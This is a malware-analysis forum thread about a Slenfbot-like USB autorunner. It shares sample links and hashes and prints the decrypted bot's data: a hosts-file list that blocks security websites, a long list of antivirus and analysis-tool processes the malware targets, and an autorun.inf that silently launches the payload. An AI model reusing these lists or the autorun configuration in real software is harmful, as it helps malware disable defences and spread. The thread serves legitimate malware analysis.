Attachments
(649.01 KiB) Downloaded 56 times
A forum for reverse engineering, OS internals and malware analysis
Attachments
(1.01 MiB) Downloaded 61 times
A while ago,i wrote some sort of article regarding league of legends themed scams,it's publshed @ MalwareDisasters and can be read here :
http://malwaredisasters.blogspot.gr/201 ... ttack.html
Funny how a kid can make his own phising tool and start spreading havoc :D
https://www.virustotal.com/file/77186a0 ... /analysis/
Thanks Xylitol for the sample.
http://malwaredisasters.blogspot.gr/201 ... ttack.html
Funny how a kid can make his own phising tool and start spreading havoc :D
https://www.virustotal.com/file/77186a0 ... /analysis/
Thanks Xylitol for the sample.
Attachments
Infected
(730.54 KiB) Downloaded 48 times
(730.54 KiB) Downloaded 48 times
I think this belongs here, sorry if should be in its own topic.
https://www.virustotal.com/en/file/d761 ... 369960479/
MD5: ff273462480a65f7601809af5a0378d1
http://www.microsoft.com/security/porta ... 2fSlenfbot
Was on the same machine that also had Palevo/Lime
https://www.virustotal.com/en/file/d761 ... 369960479/
MD5: ff273462480a65f7601809af5a0378d1
http://www.microsoft.com/security/porta ... 2fSlenfbot
Was on the same machine that also had Palevo/Lime
Attachments
pass: infected
(68.36 KiB) Downloaded 53 times
(68.36 KiB) Downloaded 53 times
thisisu wrote:I think this belongs here, sorry if should be in its own topic.Well, it is old C++ autorunner with AV blacklist and hosts data file modification. However it has a small interesting feature (only works on XP and 2003 RTM). It hides its own process from process list by patching EPROCESS ActiveProcessLinks with NtSystemDebugControl calls.
https://www.virustotal.com/en/file/d761 ... 369960479/
MD5: ff273462480a65f7601809af5a0378d1
http://www.microsoft.com/security/porta ... 2fSlenfbot
Was on the same machine that also had Palevo/Lime
In attach decrypted bot.
https://www.virustotal.com/en/file/adb7 ... /analysis/
WWW blacklist
Code: Select all
Security software blacklist
127.0.0.1 %s
www.securitynewsportal.com www.emsisoft.de foros.toxico-pc.com housecall.trendmicro.com www.bitdefender.es www.infospyware.com www.commentcamarche.net www.malwarebytes.org alerta-antivirus.red.es foros.zonavirus.com bbs.winzheng.com support.f-secure.com bbs.taisha.org bbs.kpfans.com bbs.kafan.com bbs.kafan.cn downloads.malwarebytes.org es.mcafee.com www.cfan.com.cn bbs.cfan.com.cn www.ikaka.cn www.ikaka.com software-files.download.com zhidao.ikaka.com www.eset-la.com bbs.ikaka.com file.ikaka.cn file.ikaka.com www.javacoolsoftware.com msncleaner.softonic.com www.drweb.com.es hi.baidu.com zhidao.baidu.com www.duba.net bbs.duba.net update.360safe.com update.360safe.cn updatem.360safe.cn updatem.360safe.com free.antivirus.com www.hotshare.net dl.360safe.com x.360safe.com down.360safe.com down.360safe.cn www.mvps.org forums.comodo.com deckard.geekstogo.com kaba.360.com kaba.360.cn baike.360.com baike.360.cn www.precisesecurity.com p3dev.taringa.net www.360.com www.360.cn codehard.wordpress.com www.360safe.com www.360safe.cn www.funkytoad.com acs.pandasoftware.com www.bleedingthreats.net www.net-security.org www.usbcleaner.cn www.infosecpodcast.com www.dicasweb.com.br 13iii.com www.techimo.com forum.securitycadets.com discussions.virtualdr.com www.computing.net forum.zazana.com new.taringa.net www.feedage.com www.cyberdefender.com es.kioskea.net secunia.com es.wasalive.com www.thecomputerpitstop.com www.techspot.com www.wilderssecurity.com forum.tweaks.com forums.devshed.com www.wikio.es www.experts-exchange.com www.spyany.com www.pchell.com bbs.360safe.com bbs.360safe.cn forum.clubedohardware.com.br www.taringa.net www.daniweb.com www.tweaksforgeeks.com forum.piriform.com comunidad.wilkinsonpc.com.co www.soccersuck.com www.whatthetech.com hjt.networktechs.com housecall65.trendmicro.com scanner.virus.org www.viruschief.com virscan.org www.tallemu.com espanol.answers.yahoo.com www.norman.com www.networkworld.com www.trucoswindows.es www.arswp.com www.ca.com www.cwsandbox.org www.clamwin.com www.sandboxie.com www.securitywonks.net mx.answers.yahoo.com www.webphand.com www.antivirus.about.com www.clamav.net www.personalfirewall.comodo.com www.freespywareremoval.info www.eradicatespyware.net www.spywareterminator.com www.antivirus.comodo.com pogonyuto.forospanish.com www.forospyware.es www.ziggamza.net www.mxttchina.com www.spywaredb.com www.auditmypc.com www.firewallguide.com www.vsantivirus.com www.dougknox.com www.fortiguardcenter.com www.safer-networking.org www.fortinet.com www.trendmicro.com www.forospanish.com subs.geekstogo.com www.kaspersky.es www.castlecops.com www.forums.majorgeeks.com bbs.s-sos.net www.ikarus.net www.prevx.com www.antivir.es www.2-spyware.com thejokerx.blogspot.com forospyware.com kr.ahnlab.com www.free-av.com www.techsupportforum.com es.answers.yahoo.com www.pandasecurity.com www.eset.com www.avira.com oldtimer.geekstogo.com security.symantec.com www.f-prot.com www.bitdefender.com www.futurenow.bitdefender.com www.mozilla-hispano.org www.trucoswindows.net www.ewido.net www.onlinescan.avast.com www.avast.com www.laneros.com mvps.org onecare.live.com www.file.net down.www.kingsoft.com www.eeload.com www.virscan.org www.lavasoft.com www.yoreparo.com securitywonks.net aknow.prevx.com info.prevx.com downloads.andymanchesta.com www.51nb.com www.cybertechhelp.com hijackthis.download3000.com forums.techguy.org service1.symantec.com www.daboweb.com samroeng.hi5.com fixmyim.com www.cisrt.org www.msnvirusremoval.com www.guiadohardware.net boardreader.com www.grisoft.com www.offensivecomputing.net www.avpclub.ddns.info community.thaiware.com www.sunbeltsecurity.com espanol.groups.yahoo.com www.changedetection.com www.ozzu.com www.thetechguide.com www.pcguide.com download.sysinternals.com www.rolandovera.com www.linhadefensiva.org www.clubic.com www.smokey-services.eu forums.maddoktor2.com www.geekstogo.com www.spychecker.com blogs.icerocket.com www.utilidades-utiles.com forum.hardware.fr www.infos-du-net.com files.filefont.com www.final4ever.com www.thinkpad.cn atazita.blogspot.com www.pcentraide.com changelog.fr www.raymond.cc upload.changelog.fr www.blogschapines.com www.housecall.trendmicro.com andymanchesta.com www.superdicas.com.br www.trendsecure.com www.runscanner.net www.babooforum.com.br www.rising.com www.rising.com.cn mailcenter.rising.com mailcenter.rising.com.cn www.psicofxp.com www.configurarequipos.com blog.hispasec.com www.threatexpert.com blog.threatfire.com www.siteadvisor.com www.leforo.com www.manuelruvalcaba.com www.forospyware.com secubox.aldria.com www.pantip.com hjt-data.trend-braintree.com forums.cnet.com www.malwareremoval.com www.download.f-secure.com www.virusspy.com guru5.grisoft.cz guru4.grisoft.cz www.softonic.com it.answers.yahoo.com guru3.grisoft.cz guru2.grisoft.cz guru1.grisoft.cz download.microsoft.comguru0.grisoft.cz ftp.drweb.com ladooscuro.es www.tecno-soft.com mast.mcafee.com download.mcafee.com www.mcafee.com foro.el-hacker.com www.box.net update.symantec.com customer.symantec.com liveupdate.symantec.com liveupdate.symantecliveupdate.com stdio-labs.blogspot.com ad-aware-se.uptodown.com www.kztechs.com www.symantec.com www.analysis.seclab.tuwien.ac.at securityresponse.symantec.com alerta-antivirus.inteco.es www.free.grisoft.com www.bleepingcomputer.com www.kaspersky.com www.kaspersky-labs.com www.avg-antivirus.net www.el-hacker.com www.sergiwa.com cmmings.cn linhadefensiva.uol.com.br www.sophos.com www.virustotal.com www.avp.com majorgeeks.com forum.kaspersky.com www.hijackthis.de www.viruslist.com www.spybot.info www.spywareinfo.com www.Merijn.org www.darkclockers.com www.bakunos.com wwww.experts-exchange.com download.nai.com sosvirus.changelog.fr www.zonavirus.com www.free.avg.com wwww.mcafee.com search.mcafee.com vil.nail.com foro.ethek.com www.personal.psu.edu www.resplendence.com www.pcsupportadvisor.com www.pctools.com www.elhacker.org ar.answers.yahoo.com www.greatis.com www.antirootkit.com safecomputing.umn.edu www.misec.net www.castlecrops.com espanol.dir.groups.yahoo.com z-oleg.com www.sysinternals.com www.rootkit.nl diamondcs.com.au www.chkrootkit.org dr-web-cureit.softonic.com avast-home.uptodown.com sophos.com forum.telecharger.01net.com forum.sysinternals.com www.247fixes.com sapcupgrades.com tech.pantip.com forum.malekal.com www.cddchiangmai.net www.krupunmai.com www.mostz.com www.huaifai.go.th avg.vo.llnwd.net forum.hijackthis.de forums.whatthetech.com cit.kookmin.ac.kr v.dreamwiz.com ntfaq.co.kr www.superuser.co.kr guru.avg.com www.elitepvpers.de www.virusdoctor.jp research.sunbelt-software.com lexikon.ikarus.at lurker.clamav.net www.nabble.com foro.noticias3d.com www.dazhizhu.cn virusinfo.prevx.com msnfix.changelog.fr foro.elhacker.net www.f-secure.com foros.softonic.com download.bleepingcomputer.com www.incodesolutions.com www.rootkit.comCode: Select all
Autorunner
VIPRE.EXE ISSDM_EN_32.EXE P08PROMO.EXE K7TS_SETUP.EXE AVINSTALL.EXE WITSETUP.EXE TrendMicro_TISPro_16.1_1063_x32.EXE VBA32-PERSONAL-LATEST-ENGLISH.EXE FSMB32.EXE FSGK32.EXE FSAV95.EXE FSAV530WTBYB.EXE FSAV530STBYB.EXE FSAV32.EXE FSAV.EXE FSAA.EXE FPROT.EXE FP-WIN.EXE FNRB32.EXE FIH32.EXE FCH32.EXE FAST.EXE FAMEH32.EXE F-STOPW.EXE F-PROT95.EXE F-PROT.EXE AFMAIN.EXE SPIDERUI.EXE SPIDERNT.EXE ALERTMAN.EXE RAVMOND.EXE MAKEREPORT.EXE BOXMOD.EXE 360SAFE.EXE 360RPT.EXE 360HOTFIX.EXE 360TRAY.EXE NSVMON.NPC NSAVSVC.NPC NPCGREENAGENT.NPC PUSCAN.EXE AYSERVICENT.AYE AYAGENT.AYE CMDAGENT.EXE CPF.EXE VSMON.EXE ZLCLIENT.EXE NSUTILITY.EXE NSPUPDT.EXE NAVQSCAN.EXE NSPMAIN.EXE NSPUPSVC.EXE NSPSVC.EXE MKSADMINCONSOLE.EXE MKSUPDATE.EXE MKSPC.EXE MKSFWALL.EXE MKSVIRMONSVC.EXE MKS_SCAN.EXE MKS_MAIL.EXE MKSREGMON.EXE KAVPFW.EXE KASMAIN.EXE KAV32.EXE KPFWSVC.EXE KISSVC.EXE KWATCH.EXE KPFW32.EXE KAVSTART.EXE KVSRVXP.EXE KVOL.EXE KVXP.KXP KVMONXP.KXP CAVASM.EXE CMAIN.EXE ARCABIT.CORE.LOGGINGSERVICE.EXE ARCABIT.CORE.CONFIGURATOR2.EXE TASKSCHEDULER.EXE UPDATE.EXE NETMONSV.EXE FILEMONSV.EXE ABREGMON.EXE.EXE ARCACHECK.EXE ARCAVIR.EXE AVMENU.EXE A2HIJACKFREE.EXE A2SERVICE.EXE A2START.EXE A2SCAN.EXE A2GUARD.EXE VRFWSVC.EXE HFACSVC.EXE VRMONSVC.EXE HPCSVC.EXE HSVCMOD.EXE VRMONNT.EXE VBA32ADS.EXE VBA32LDR.EXE FILELOCKSETUP.EXE TSCFCOMMANDER.EXE TMPROXY.EXE TMPFW.EXE TMBMSRV.EXE UFNAVI.EXE UFSEAGNT.EXE MKSTRAY.EXE TISSPWIZ.EXE SFCTLCOM.EXE TNBUTIL.EXE DEFWATCH.EXE RTVSCAN.EXE SBAMSVC.EXE SBAMUI.EXE SBAMTRAY.EXE SAVADMINSERVICE.EXE SAVSERVICE.EXE SCFSERVICE.EXE SCFMANAGER.EXE RAVTASK.EXE CCENTER.EXE ULIBCFG.EXE RAVLITE.EXE PCTAV.EXEPCTAVSVC.EXEPXCONSOLE.EXEPXAGENT.EXERAV.EXE PCTSAUXS.EXE PCTSTRAY.EXE PCTSSVC.EXE PCTSGUI.EXE AVGAS.EXE PAVBCKPT.EXE WEBPROXY.EXE PAVSRV51.EXESRVLOAD.EXE PSIMSVC.EXE PSHOST.EXE AVENGINE.EXE PSKMSSVC.EXE PAVPRSRV.EXE PAVFNSVR.EXE PSCTRLS.EXE TPSRV.EXE NOD32M2.EXE NOD32CC.EXE NOD32.EXE NMAIN.EXE NOD32KUI.EXE MSASCUI.EXE MSMPENG.EXE MCUPDATE.EXE MCSHIELD.EXE MCVSSHLD.EXE MCVSRTE.EXE MCAGENT.EXE KAVSVC.EXE KAV.EXE K7TSMNGR.EXE K7SPMSRC.EXE K7RTSCAN.EXE K7PSSRVC.EXE K7FWSRVC.EXE K7EMLPXY.EXE K7TSECURITY.EXE K7SYSTRY.EXE VIRUSUTILITIES.EXE GUARDXSERVICE.EXE GUARDXKICKOFF.EXE AVKWCTL.EXE AVKTUNERSERVICE.EXE AVKSERVICE.EXE GDFWSVC.EXE AVKPROXY.EXE GDFIRE~1.EXE AVKTRAY.EXE GDFIREWALLTRAY.EXE FSAUA.EXE FSDFWD.EXE FSGK32ST.EXE FSM32.EXE FPWIN.EXE FPAVSERVER.EXE FPROTTRAY.EXE INICIO.EXE NOD32KRN.EXE FSMA32.EXE APVXDWIN.EXE UMXPOL.EXE UMXFWHLP.EXE UMXAGENT.EXE UMXCFG.EXE PPCLTPRIV.EXE SVCPRS32.EXE ITMRTSVC.EXE CCPROVSP.EXE MDMCLS32.EXE CAGLOBALLIGHT.EXE CAPFUPGRADE.EXE CAPFASEM.EXE CAFW.EXE CFGMNG32.EXE CCTRAY.EXE CLAMTRAY.EXE CLAMWIN.EXE ALSVC.EXE ALMON.EXE DRWEBSCD.EXE SPIDERML.EXE DRWEB32W.EXE ACS.EXE STRTSVC.EXE OP_MON.EXE SENSOR.EXE QHFW332.EXE CATEYE.EXE ONLNSVC.EXE EMLPROUI.EXE UPSCHD.EXE SCANMSG.EXE SCANWSCS.EXE EMLPROXY.EXE ONLINENT.EXE ASWCLNR.EXE BDAGENT.EXE VSSERV.EXE LIVESRV.EXE XCOMMSVR.EXE UISCAN.EXE BDSS.EXE AVGCMGR.EXE AVGWSRV.EXE AVGUI.EXE AVGSCANX.EXE AVGUPSVC.EXE AVGAMSVR.EXE AVGUPD.EXE AVGTRAY.EXE AVGFRW.EXE AVGEMC.EXE AVGNSX.EXE AVGRSX.EXE AVGWDSVC.EXE ASHWEBSV.EXE ASHMAISV.EXE ASWUPDSV.EXE ASHSERV.EXE ASHDISP.EXE AVCENTER.EXE SCHED.EXE AVIRARKD.EXE AVGNT.EXE AVGUARD.EXE AHNSDSV.EXE ACAIS.EXE ACALS.EXE ACAEGMGR.EXE QOELOADER.EXE ACAAS.EXE QUHLPSVC.EXE AVGCSRVX.EXE 123.EXE RAVP.EXEMBAM.EXE123.COM UNIEXTRACT.EXE SYSANALYZER_SETUP.EXE STARTDRECK.EXE SPF.EXE REGX2.EXE REGSHOT.EXE REGSCANNER.EXE REGISTRAR_LITE.EXE REGCOOL.EXE REGALYZ.EXE PROJECTWHOISINSTALLER.EXE PROCMON.EXE CUREIT.EXE FIXBAGLE.EXE PGSETUP.EXE OBJMONSETUP.EXE NETALYZ.EXE KILLBOX.EXE INSTALLWATCHPRO25.EXE AVENGER.EXE IEFIX.EXE HOSTSFILEREADER.EXE FIXPATH.EXE FILEFIND.EXE FILEALYZ.EXE EULALYZERSETUP.EXE A2HIJACKFREESETUP.EXE DLLCOMPARE.EXE CPROCESS.EXE CPORTS.EXE ASVIEWER.EXE APT.EXE APM.EXE WIRESHARK.EXE SPYBOTSD.EXE TEATIMER.EXE SPYBOTSD160.EXE PROCESSMONITOR.EXE PROCDUMP.EXE PG2.EXE LORDPE.EXE ICESWORD.EXE REANIMATOR.EXE ROOTKITNO.EXE RKD.EXE HACKMON.EXE UNHACKME.EXE ROOTKIT_DETECTIVE.EXE AVGARKT.EXE FSB.EXE FSBL.EXE ROOTKITREVEALER.EXE PSKILL.EXE TASKMON.EXE TASKLIST.EXE TASKMAN.EXE PROCEXP.EXE MSNFIX.EXE HIJACKTHIS_V2.EXE HIJACKTHIS.EXE HIJACKTHIS_SFX.EXE HJTSETUP.EXE HJTINSTALL.EXE OLLYDBG.EXE NETSTAT.EXE PORTMONITOR.EXE PORTDETECTIVE.EXE FPORT.EXE APORTS.EXE PAVARK.EXE DARKSPY105.EXE HELIOS.EXE ROOTKITBUSTER.EXE ROOTALYZER.EXE BC5CA6A.EXE SEEM.EXE DELAYDELFILE.EXE DUBATOOL_AV_KILLER.EXE SUPERKILLER.EXE KAKASETUPV6.EXE BUSCAREG.EXE MSNCLEANER.EXE SRESTORE.EXE BOOTSAFE.EXE SUPERANTISPYWARE.EXE REGUNLOCKER.EXETSNTEVAL.EXEXP_TASKMGRENAB.EXE CF9409.EXE GMER.EXE CATCHME.EXE SDFIX.EXE COMBOFIX.EXE SRENGPS.EXE AUTORUNS.EXE TASKKILL.EXE REG.EXE MYPHOTOKILLER.EXE KILLAUTOPLUS.EXE FOLDERCURE.EXE REGEDIT.SCR REGEDIT.COM TCPVIEW.EXE LISTO.EXE GUARD.EXE NTVDM.EXE COMMAND.COM COMBOFIX.COM COMBOFIX.SCR COMOBO-FIX.EXE COMBOFIX.BAT COMBO-FIX.EXE REGMON.EXE OTMOVEIT.EXEMBAM-SETUP.EXE JAJA.EXE AVZ.EXE MBAM.EXE MBAM-SETUP.EXE PENCLEAN.EXE ELISTA.EXE HJ.EXE WINDOWS-KB890930-V2.2.EXE MRTSTUB.EXE MRT.EXE HIJACK-THIS.EXE VIRUS.EXE SAFEBOOTKEYREPAIR.EXEOTMOVEIT3.EXEHOSTSXPERT.EXEDAFT.EXE ATF-CLEANER.EXE COMPAQ_PROPIETARIO.EXE REGUNLOCKER.EXE UNLOCKERASSISTANT.EXE UNLOCKER.EXE SRENGLDR.EXE HOOKANLZ.EXE UNLOCKER1.8.7.EXECode: Select all
\autorun.inf
[aUTOrUN]
useautoplay=1
;?ВX?лтсLLЭмIL?Н?Г?
sHELL\\explore\\\command=cmd /c start "" "CACHE-19204730\comd.sys"
;ЭмIL?Н?Г??ВX?лтсLL
sHELL\\open\\\command=cmd /c start "" "CACHE-19204730\comd.sys"
;OOмБГ?D
action=Open folder to view files using Windows Explorer
н?ИГТv
icon=%SystemRoot%\system32\SHELL32.dll,4
;??Cd
open=cmd /c start "" "CACHE-19204730\comd.sys"
:nop
;M?Ц???В Attachments
pass: infected
(35.13 KiB) Downloaded 54 times
(35.13 KiB) Downloaded 54 times
Ring0 - the source of inspiration
